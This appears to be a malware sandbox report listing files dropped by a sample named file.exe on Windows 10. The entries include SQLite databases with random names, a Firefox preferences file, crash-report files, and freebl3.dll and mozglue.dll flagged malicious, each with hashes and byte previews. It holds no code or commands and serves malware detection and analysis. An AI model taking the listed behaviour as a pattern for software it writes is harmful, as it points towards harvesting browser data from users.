SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DBGHDGHCGHCAAKFIIECFHCFBFC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGCBFIEHIEGCAAAKKKKE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBFIJJEBKEBFCBGDAEGD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIDAFCAFCBKECBGCFIIJJJEBGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JECAEHJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJEHJKJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJKJJEGIDBGIDGCBAFHCGCGCGD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ba77748b9b.exe_c52996289693f72af0efe8aebf14278e62b8f65_2a85276a_1729a490-1b0b-4b14-93d9-4fdfc415ec02\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.970737383984216
Encrypted:	false
SSDEEP:	192:MCc8IsO0b9ADjEhZrMZtzuiFZZ24IO8v:O8Is1b9ADjbTzuiFZY4IO8v
MD5:	EE759D2E9B306D3B328EEFAEDAF22CD5
SHA1:	48FCBD9A953FEA5A32CA0A51DA3DE7CCF48E9626
SHA-256:	3EE1A4AE1A5F5A1F07BAF04991ED24B9220C1E3EDC729FA117DDA4647BDF769C
SHA-512:	86D92B2493C4C74407B96365AB8209CFB57D6852A38EFC3D05D34484DD12933154F8D270123906A4A2A26C09CD22545042CA4B1FFE6E461BACED96D8E95A1634
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.8.3.0.2.8.4.6.2.0.0.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.8.3.0.2.9.4.9.1.0.7.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.2.9.a.4.9.0.-.1.b.0.b.-.4.b.1.4.-.9.3.d.9.-.4.f.d.f.c.4.1.5.e.c.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.c.4.8.4.9.f.-.d.d.2.9.-.4.4.b.5.-.b.5.a.d.-.0.1.e.0.9.8.8.0.9.b.2.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.7.7.7.4.8.b.9.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.4.8.-.0.0.0.1.-.0.0.1.4.-.5.7.6.b.-.4.3.7.6.7.4.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.3.5.b.2.9.8.4.0.f.f.3.0.0.7.6.d.6.8.a.2.6.9.8.a.d.6.5.a.2.3.3.0.0.0.0.f.f.f.f.!.0.0.0.0.6.6.0.a.9.b.6.a.d.3.f.5.c.d.1.b.d.3.7.e.0.4.0.1.5.b.2.5.a.8.9.3.d.e.4.c.5.f.9.0.!.b.a.7.7.7.4.8.b.9.b...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_f6cf9649caee60e34e7dc846b8ef82147e12f8_864df792_3eae7e71-a0ca-454a-b251-32c63d31ac5e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1154316625815617
Encrypted:	false
SSDEEP:	192:YBXchvGPlTtO0lei5xoE3jEhZrMZOVU5zuiF2Z24IO8ThB:rGN51lL5xbjbcIzuiF2Y4IO8r
MD5:	770846E6B5BA1CB9120FDB111ABE8FE9
SHA1:	D438A4B55115F05DE3A803889AA17F0D94C22B1E
SHA-256:	3BDDD8802E70E09F9569AA3471C38172E3C895213A2F6CCD3B24730DC08BA582
SHA-512:	1F4CE2B6B35A692B526CD30B8C093FAD87D414737B13726F0E53684429F4CB3757A530A16831187342D74D258AE93159363516398D3098A78F786F4B9BFDD634
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.8.2.9.8.5.2.5.1.4.6.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.8.2.9.8.6.5.6.4.0.2.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.a.e.7.e.7.1.-.a.0.c.a.-.4.5.4.a.-.b.2.5.1.-.3.2.c.6.3.d.3.1.a.c.5.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.2.3.f.c.d.d.-.0.3.0.7.-.4.8.f.5.-.9.b.5.3.-.9.6.3.b.f.6.c.f.5.e.f.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.6.8.-.0.0.0.1.-.0.0.1.4.-.e.4.6.b.-.2.d.4.f.7.4.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.6.6.0.a.9.b.6.a.d.3.f.5.c.d.1.b.d.3.7.e.0.4.0.1.5.b.2.5.a.8.9.3.d.e.4.c.5.f.9.0.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7395.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Jul 26 15:57:08 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	63894
Entropy (8bit):	1.9353756417996566
Encrypted:	false
SSDEEP:	192:2WxXivcdJauXLOkOJwqe3/CWsKywS9HibOBI4ly/eQlzdbEhqxartW02LCH5ggQ:scdJ+kEne3/CDnBDwlJOmepQ
MD5:	4F6218B22D6181A2C047CFF977E20C0B
SHA1:	096E9A4C0BCD5FFEAB467D4F0505BE8DFF8BB435
SHA-256:	EB6DC1170D7193B6DB0F368D74F5123360C3CE48E4CA2EE2F74BF5F4D2A109BC
SHA-512:	64AAA43C7A185782708C894CEFF953C79F52E7BF1D639B4A34468D0BCF00F4B797605E7CE22F81F163D46DEEEA5E0F516671D8269B330F9A461653ACA40D015D
Malicious:	false
Preview:	MDMP..a..... .......T.f............4...............<............*..........T.......8...........T...........P3..F.......................................................................................................eJ......H.......GenuineIntel............T.......H...Q.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7480.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8324
Entropy (8bit):	3.6927446208856054
Encrypted:	false
SSDEEP:	192:R6l7wVeJKy6frtp6YKm6qtBKtGgmf+epDr89bzXsfWXRm:R6lXJv6ztp6Y76qjK8gmf+/zcfh
MD5:	F85041DAD7111AA3C9FF0AD90CF7B36B
SHA1:	64FED213F6B615EDE1AE73C9FDD2F9E96E251D86
SHA-256:	B3F1CA8EE9946E17A25391B4C4F303E3423F51B2C16BC3C11B7FFE88ABB3DC28
SHA-512:	B21C30BCBE07F0321F2E6A72C701DB27B9757464055FC65611EC7E0C1F7BD8C5AFA861EAB893710507D24273D2191D86B004BF25E281FF92530A81740C3D2831
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER74D0.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.441645447978797
Encrypted:	false
SSDEEP:	48:cvIwWl8zs2Jg77aI9wrWpW8VYyYm8M4JBkMFE+q8SmhbSKBYRd:uIjfMI7ea7VGJBsubSKBYRd
MD5:	9D955C28757D17A5E9CCA9D9B56FAF84
SHA1:	0E5F233E46FDCE524854F550EC82E4143D199F8F
SHA-256:	AF566B10F2A082B0724B40BB0C4BAAF2FB80737360A00241334DCE13881B14F5
SHA-512:	3EFF809301AD361A8FECB36A7DD2A18618B9B7FEE45EEF9A349C91885E607532CB6D31333312E81AAB8660825BB7A1FA161D92570B7A77ED280BD3ED063BB298
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="428099" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCAF1.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Jul 26 15:56:25 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	60346
Entropy (8bit):	2.641971085412528
Encrypted:	false
SSDEEP:	384:erm4ZOH47kEr1CDyhNiXFzSjxryi4f0qTP:eq4QH47kE3/S18yi4B7
MD5:	AB69D78E49C1CDBDAD7BB3FA361532CC
SHA1:	E8C76B029DD755B3900FE9385845012E1D62A023
SHA-256:	91B24F8544CE83139477AC62EC5BA1348CDEE32416C3E1738A2E845D5771849D
SHA-512:	44709D22F97E1FA1EE7124028B17006510DDCE70A008585C639970EC366228F62A390A81A1DC0690BD28C5220C60C0B0F323478C8E2BAA2AC0CDF13E4753BFCE
Malicious:	false
Preview:	MDMP..a..... .......).f............4...............<............7..........T.......8...........T............_..2............&...........(..............................................................................eJ......h)......GenuineIntel............T.......h.....f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCDFF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8308
Entropy (8bit):	3.6896517499285295
Encrypted:	false
SSDEEP:	192:R6l7wVeJ7Cp6t6YEIuSU9El6gmfB1i47apDp89b+8GsfFKm:R6lXJQ6t6YEhSU9El6gmf+0R+8lfJ
MD5:	37CB4D16043B0063CD632F1533AD14F8
SHA1:	F0A327C6049EC7AA0C42369B0C467B07CFFF5590
SHA-256:	FBF4BF07326A9F04FF6C1759A5A11E78F37141B55E9BBCB28B1C6457CB8C172A
SHA-512:	94FFCB10D8011449B05F4910DD1F29D126B4A77604E733E6DD08C3916C5FE1E28834F48D1E8CC60466F316A712DCDF96A21CDD80A62BA638AA4640CBD750DE57
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.6.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE9D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	4.418149114136167
Encrypted:	false
SSDEEP:	48:cvIwWl8zs2Jg77aI9wrWpW8VYiYm8M4JWlFAkJ+q80Vy+FBPkd:uIjfMI7ea7VqJQfy+FBPkd
MD5:	226230E294232E6F3BFE5E88F9F98542
SHA1:	7C88F038E2956A69E5F1A5BECAD34A89EC43CC45
SHA-256:	B3BCE3B498AD20202CFE165CE6E17C1A3B5278A159CE83F5E1589300777877A6
SHA-512:	9C7846C5480104DE68A1B1CF0105A5BD370CF4D9F791C84071997EECE1AA82CC87C5A3928F3281B535F520FC9141D40F484346051D44868B32D01312867D322F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="428099" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: 6SoKuOqyNh.exe, Detection: malicious, Browse Filename: IRqsWvBBMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JGKjBsQrMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Bootstrapper.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: 6SoKuOqyNh.exe, Detection: malicious, Browse Filename: IRqsWvBBMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JGKjBsQrMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Bootstrapper.exe, Detection: malicious, Browse
